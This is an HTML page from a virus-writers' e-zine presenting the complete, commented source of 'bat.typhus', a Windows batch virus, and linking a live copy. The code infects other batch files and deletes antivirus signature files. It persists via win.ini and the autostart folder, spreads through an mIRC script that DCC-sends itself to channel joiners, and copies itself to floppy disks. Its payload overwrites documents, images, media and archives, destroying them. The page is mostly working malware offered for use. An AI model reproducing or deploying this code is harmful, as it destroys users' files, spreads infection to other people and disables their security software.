<html>
<head>
<title>rRlf #1</title>
</head>
<body text="#000000" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>When the going gets weird the weird turn pro</i>
<br><table cellpadding="9">
<tr>
<th><a href="10.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="12.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>bat.typhus by philet0ast3r</u></b>
<p>This is my eighth virus (my sixt batch-virus), and it was written January 2001.
<br>At first I planned to write this one also for SallyOne Group E-Zine #1, but then the whole thing died, so I wrote the second half for this zine.
<br>This virus is very similar to bat.kia. But it has a more destructive payload.
<br>Nevertheless, here are some facts about it:
<br>-bat-infector
<br>-parasitic
<br>-mIRC worm
<br>-spreads via disks
<br>-autostart-secured win.ini-residency
<br>-retro: F-Prot 95, McAfee, Thunderbyte, Norton AntiVirus 2000 (it does not recognize the virus, even if heuristic is at maximum)
<br>-payload: overwrites all files in the current directory with the following extensions with the virus:
<br>&nbsp;.txt, .doc, .dot, .rtf, .pdf, .xls, .hlp, .htm, .html, .inf, .bmp, .jpg, .gif, .pcx, .cpt, .avi, .mpg, .mov, .swf, .scr, .ppt, .wav, .mp3, .zip, .rar, .arj, .lzh
<br>-copies itself as call-back to the root-directory
<br>-fully compatible to Windows ME, Windows 98, Windows 95 (has been tested)
<br>-size: 2.532 bytes
<p>Well, here is the script (with some comments "-->"; have to be removed for virus to run) ...
<br>phile-name should be bat.typhus.bat, but it's not neccessary:
<p>::Where's your sense of life? (tph)
<br>::Right.
<br>::It's not there like the file you wanted. (tph)
<br>::Perhaps you got to change something ... (tph)
<p>-->the above is some kind of message-payload
<br>-->if a file gets overwritten by the payload,
<br>-->and the file can display text, the user can read this message
<p>@echo off%_tph%
<br>if '%1=='tph goto tph%2
<br>set tph=%0.bat
<br>if not exist %tph% set tph=%0
<br>if '%tph%==' set tph=autoexec.bat
<br>if exist c:\_tph.bat goto tphg
<br>if not exist %tph% goto etph
<br>find "tph"<%tph%>c:\_tph.bat
<br>attrib c:\_tph.bat +h
<br>:tphg
<br>command /e:5000 /c c:\_tph tph vir
<p>-->the above is a quite normal infection-routine
<br>-->the hidden call-back-file is also created here
<p>:etph
<br>ctty nul.tph
<br>if exist c:\_tph.bat del c:\programme\norton~1\s32integ.dll
<br>if exist c:\_tph.bat del c:\programme\f-prot95\fpwm32.dll
<br>if exist c:\_tph.bat del c:\programme\mcafee\scan.dat
<br>if exist c:\_tph.bat del c:\tbavw95\tbscan.sig
<p>-->the above is the retro-routine
<br>-->the avs can not scan without those files
<p>if exist c:\windows\startmen�\programme\autostart\antivir.bat goto rdtph
<br>copy bat.typhus.bat c:\windows\tph.sys
<br>echo @echo off>tphhh.bat
<br>echo ctty nul>>tphhh.bat
<br>echo if exist c:\windows\system\bat.typhus.bat goto 0k>>tphhh.bat
<br>echo copy c:\windows\tph.sys c:\windows\system\bat.typhus.bat>>tphhh.bat
<br>echo :0k>>tphhh.bat
<br>move tphhh.bat c:\windows\startmen�\programme\autostart\antivir.bat
<p>-->the above is the autostart-secure-routine for the residency
<br>-->it checks if the win.ini-residency is still working
<p>-->the below is the residency-routine
<br>-->it infects the win.ini
<br>-->the empty lines are neccessary for windows taking this as true win.ini
<p>:rdtph
<br>if exist c:\windows\system\bat.typhus.bat goto wytph
<br>copy bat.typhus.bat c:\windows\system
<br>copy bat.typhus.bat + c:\windows\win.ini c:\windows\system\win.ini
<br>del c:\windows\win.ini
<br>move c:\windows\system\win.ini c:\windows
<br>goto wytph
<p>[windows]
<br>load=c:\windows\system\bat.typhus.bat
<br>run=C:\WINDOWS\SYSTEM\cmmpu.exe
<br>NullPort=None
<p>:wytph
<br>echo [script]>tph23.bat
<br>echo n0=on 1:JOIN:#:{ >>tph23.bat
<br>echo n1= /if ( nick == $me ) { halt } >>tph23.bat
<br>echo n2= /.dcc send $nick c:\windows\system\bat.typhus.bat >>tph23.bat
<br>echo n3=} >>tph23.bat
<br>if exist c:\mirc\mirc.ini copy tph23.bat c:\mirc\script.ini
<br>if exist c:\mirc32\mirc.ini copy tph23.bat c:\mirc32\script.ini
<br>if exist c:\progra~1\mirc\mirc.ini copy tph23.bat c:\progra~1\mirc\script.ini
<br>if exist c:\progra~1\mirc32\mirc.ini copy tph23.bat c:\progra~1\mirc32\script.ini
<p>-->the above is the worm-routine
<br>-->it makes a mIRC-script-file and places it in a possible mIRC-directory
<p>:ditph
<br>if exist tph23.bat command /f /c copy c:\windows\system\bat.typhus.bat a:\
<p>-->the above is a command line, that makes it possible to copy to diskettes
<br>-->there will be no error if there is no disk in drive a:
<br>-->or if it is writeprotected or full
<P>:pltph
<br>if exist tph23.bat for %%i in (*.txt,*.doc,*.dot,*.rtf,*.pdf,*.xls,*.hlp,*.htm,*.html,*.inf,*.bmp,*.jpg,*.gif,*.pcx,*.cpt,*.avi,*.mpg,*.mov,*.swf,*.scr,*.ppt,*.wav,*.mp3,*.zip,*.rar,*.arj,*.lzh) do copy %0 %%i>nul
<br>del tph23.bat
<p>-->the above is the payload
<br>-->it searches for all files with the given extensions in the current directory
<br>-->all found files are overwritten with the virus
<br>-->(that means there is no rest of the file, even if the file is bigger than the virus;
<br>-->so the file is completly destroyed)
<p>:natph
<br>set tph=
<br>goto tphend
<br>:tphvir
<br>for %%a in (*.bat ..\*.bat c:*.bat) do call c:\_tph tph i %%a
<br>exit tph
<br>:tphi
<br>find "tph"<%3>nul
<br>if not errorlevel 1 goto tphj
<br>type c:\_tph.bat>tph$
<br>type %3>>tph$
<br>move tph$ %3>nul
<br>exit tph
<br>:tphj
<br>set tph!=%tph!%1
<br>if %tph!%==1 exit
<br>:tphend
<p>-->the above is the rest of the infection-routine
<p><a href="11.zip">living virus</a>
</body>
</html>
